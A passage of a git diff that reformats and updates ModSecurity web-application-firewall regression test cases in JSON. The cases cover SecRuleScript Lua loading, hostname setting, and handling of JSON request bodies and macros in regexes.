" <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": ".*", - "error_log": "" + "http_code": 200 }, "rules": [ "SecRuleEngine On", @@ -58,7 +59,6 @@ "SecRule ARGS \"@contains /test.txt\" \"id:4,allow\"", "SecRule ARGS:teste \"@contains /test.txt\" \" id:1,allow,deny\"", "SecRule ARGS \"@contains /test.txt\" \"allow, allow,id:2,deny\"" - ] } ] diff --git a/test/test-cases/regression/directive-sec_rule_script.json b/test/test-cases/regression/directive-sec_rule_script.json index b8eb904759..d17e00743e 100644 --- a/test/test-cases/regression/directive-sec_rule_script.json +++ b/test/test-cases/regression/directive-sec_rule_script.json @@ -1,201 +1,210 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: SecRuleScript (1/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecRuleScript (1/4)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } - }, - "expected":{ - "audit_log":"", - "debug_log":"", - "error_log":"", - "parser_error":"Failed to load script: Failed to compile script 'test-cases/data/match" - }, - "rules":[ + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, + "parser_error": "Failed to load script: Failed to compile script 'test-cases/data/match" + }, + "rules": [ "SecRuleEngine On", "SecRuleScript test-cases/data/match-ops.lua \"id:1,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: SecRuleScript (2/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecRuleScript (2/4)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } - }, - "expected":{ - "audit_log":"", - "debug_log":"", - "error_log":"", - "parser_error":"Failed to load script: Failed to compile script " - }, - "rules":[ + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, + "parser_error": "Failed to load script: Failed to compile script " + }, + "rules": [ "SecRuleEngine On", "SecRuleScript /bin/echo \"id:1,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: SecRuleScript (3/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecRuleScript (3/4)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" + }, + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } - }, - "expected":{ - "audit_log":"", - "debug_log":"echo 123", - "error_log":"", - "parser_error":"", + "body": [ + "" + ] + }, + "expected": { + "debug_log": "echo 123", "http_code": 404 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleScript test-cases/data/match-log.lua \"id:1,t:lowercase,t:none,status:404,deny\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: SecRuleScript (4/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecRuleScript (4/4)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } - }, - "expected":{ - "audit_log":"", - "debug_log":"Running \\(disruptive\\) action: deny", - "error_log":"", - "parser_error":"", + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Running \\(disruptive\\) action: deny", "http_code": 404 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleScript test-cases/data/match.lua \"id:1,t:lowercase,t:none,status:404,deny\"" ] } ] - diff --git a/test/test-cases/regression/fn-setHostname.json b/test/test-cases/regression/fn-setHostname.json index 59c5b52e8f..461bfcde32 100644 --- a/test/test-cases/regression/fn-setHostname.json +++ b/test/test-cases/regression/fn-setHostname.json @@ -1,38 +1,42 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing function :: setRequestHostName", + "enabled": 1, + "version_min": 300000, + "title": "Testing function :: setRequestHostName", "client": { - "ip":"200.249.12.31" + "ip": "200.249.12.31", + "port": 0 }, - "server":{ - "ip":"200.249.12.31", - "port":80, - "hostname":"modsecurity.org" + "server": { + "ip": "200.249.12.31", + "port": 80 }, "request": { "headers": { - "Host":"www.modsecurity.org" + "Host": "www.modsecurity.org" }, - "uri":"/foo?q=attack", - "http_version": 1.1 + "uri": "/foo?q=attack", + "method": "", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/plain" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/plain" }, - "body":[ + "body": [ "denystring" ] }, - "expected":{ - "http_code": 403, - "debug_log": "[hostname: \"modsecurity.org\"]" + "expected": { + "debug_log": "[hostname: \"modsecurity.org\"]", + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecResponseBodyAccess On", "SecRule ARGS_GET \"@contains attack\" \"id:1,phase:2,deny\"" diff --git a/test/test-cases/regression/issue-1152.json b/test/test-cases/regression/issue-1152.json index 54c78f7991..d6e0dd941f 100644 --- a/test/test-cases/regression/issue-1152.json +++ b/test/test-cases/regression/issue-1152.json @@ -4,7 +4,7 @@ "version_min": 209000, "version_max": -1, "title": "Should libmodsec pass action clear m_actions?", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1152", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1152", "client": { "ip": "200.249.12.31", "port": 2313 @@ -16,8 +16,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -27,16 +27,21 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?foo=bar", + "uri": "/test.pl?foo=bar", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" - } + }, + "body": [ + "" + ] }, "expected": { "http_code": 403 @@ -52,7 +57,7 @@ "version_min": 209000, "version_max": -1, "title": "Should libmodsec pass action clear m_actions?", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1152", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1152", "client": { "ip": "200.249.12.31", "port": 2313 @@ -64,8 +69,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -75,17 +80,20 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?foo=bar", + "uri": "/test.pl?foo=bar", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ + "" ] }, "expected": { @@ -102,7 +110,7 @@ "version_min": 209000, "version_max": -1, "title": "Should libmodsec pass action clear m_actions?", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1152", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1152", "client": { "ip": "200.249.12.31", "port": 2313 @@ -114,8 +122,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -125,17 +133,20 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?foo=bar", + "uri": "/test.pl?foo=bar", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ + "" ] }, "expected": { @@ -152,7 +163,7 @@ "version_min": 209000, "version_max": -1, "title": "Should libmodsec pass action clear m_actions?", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1152", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1152", "client": { "ip": "200.249.12.31", "port": 2313 @@ -164,8 +175,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -175,22 +186,25 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?a=test&b=test&c=test&d=test", + "uri": "/test.pl?a=test&b=test&c=test&d=test", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ + "" ] }, "expected": { - "http_code": 200, - "debug_log": "Target value: \"4\" \\(Variable: TX:test\\)" + "debug_log": "Target value: \"4\" \\(Variable: TX:test\\)", + "http_code": 200 }, "rules": [ "SecRuleEngine On", diff --git a/test/test-cases/regression/issue-1528.json b/test/test-cases/regression/issue-1528.json index f2257055c2..2a8255d565 100644 --- a/test/test-cases/regression/issue-1528.json +++ b/test/test-cases/regression/issue-1528.json @@ -1,38 +1,46 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Macro expansion inside regex does not work", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1528", - "gihub_issue": 1528, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "uri":"/?param=attack", - "headers": "", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 1", - "error_log": "Matched \"Operator `Rx' with parameter `\\^attack\\$'" - }, - "rules": [ - "SecRuleEngine On", - "SecAction \"id:1, nolog, setvar:tx.bad_value=attack\"", - "SecRule ARGS:param \"@rx ^%{tx.bad_value}$\" \"id:2,block\"" - ] -} + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Macro expansion inside regex does not work", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1528", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + + }, + "uri": "/?param=attack", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 1", + "error_log": "Matched \"Operator `Rx' with parameter `\\^attack\\$'", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecAction \"id:1, nolog, setvar:tx.bad_value=attack\"", + "SecRule ARGS:param \"@rx ^%{tx.bad_value}$\" \"id:2,block\"" + ] + } ] diff --git a/test/test-cases/regression/issue-1565.json b/test/test-cases/regression/issue-1565.json index 6596404f17..da66ac574c 100644 --- a/test/test-cases/regression/issue-1565.json +++ b/test/test-cases/regression/issue-1565.json @@ -1,79 +1,92 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Problem with OWASP CRS rule 920160 when msc_process_request_headers called (1/2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1565", - "gihub_issue": 394, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "1539" + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Problem with OWASP CRS rule 920160 when msc_process_request_headers called (1/2)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1565", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 0." - }, - "rules": [ - "SecRuleEngine On", - "SecRule REQUEST_HEADERS:Content-Length \"!^\\d+$\" \"id:1,log\"" - ] -}, -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Problem with OWASP CRS rule 920160 when msc_process_request_headers called (2/2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1565", - "gihub_issue": 394, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "1539" + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 1" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "1539" + }, + "uri": "", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 0.", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_HEADERS:Content-Length \"!^\\d+$\" \"id:1,log\"" + ] }, - "rules": [ - "SecRuleEngine On", - "SecRule REQUEST_HEADERS:Content-Length \"^\\d+$\" \"id:1,log\"" - ] -} + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Problem with OWASP CRS rule 920160 when msc_process_request_headers called (2/2)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1565", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "1539" + }, + "uri": "", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 1", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_HEADERS:Content-Length \"^\\d+$\" \"id:1,log\"" + ] + } ] diff --git a/test/test-cases/regression/issue-1576.json b/test/test-cases/regression/issue-1576.json index eb41e1dfb6..68d193c9bf 100644 --- a/test/test-cases/regression/issue-1576.json +++ b/test/test-cases/regression/issue-1576.json @@ -4,21 +4,25 @@ "version_min": 209000, "version_max": -1, "title": "JSON array should be handled even without a key (1)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1576", - "client":{ - "ip":"200.249.12.31", - "port":123 + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1576", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "application/json" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "{", " \"foo\":\"bar\",", @@ -33,18 +37,23 @@ "}" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log": "zwei\" \\(Variable: ARGS:json.ops.array_3.eins.array_0" + "expected": { + "debug_log": "zwei\" \\(Variable: ARGS:json.ops.array_3.eins.array_0", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", - "SecRule ARGS \"asdf\" \"id:'200441',phase:3,log\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", + "SecRule ARGS \"asdf\" \"id:'200441',phase:3,log\"" ] }, { @@ -52,21 +61,25 @@ "version_min": 209000, "version_max": -1, "title": "JSON array should be handled even without a key (2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1576", - "client":{ - "ip":"200.249.12.31", - "port":123 + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1576", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "application/json" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "[", " \"one\",", @@ -75,18 +88,23 @@ "]" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log": "three\" \\(Variable: ARGS:json.array_2\\)" + "expected": { + "debug_log": "three\" \\(Variable: ARGS:json.array_2\\)", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", - "SecRule ARGS \"asdf\" \"id:'200441',phase:3,log\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", + "SecRule ARGS \"asdf\" \"id:'200441',phase:3,log\"" ] }, { @@ -94,21 +112,25 @@ "version_min": 209000, "version_max": -1, "title": "JSON array should be handled even without a key (3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1576", - "client":{ - "ip":"200.249.12.31", - "port":123 + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1576", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "application/json" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "{", " \"foo\":\"bar\",", @@ -126,18 +148,23 @@ "}" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log": "treze\" \\(Variable: ARGS:json.ops.seis.doze\\)" + "expected": { + "debug_log": "treze\" \\(Variable: ARGS:json.ops.seis.doze\\)", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", - "SecRule ARGS \"asdf\" \"id:'200441',phase:3,log\"" + "rules": [ + "SecRuleEngine On", + 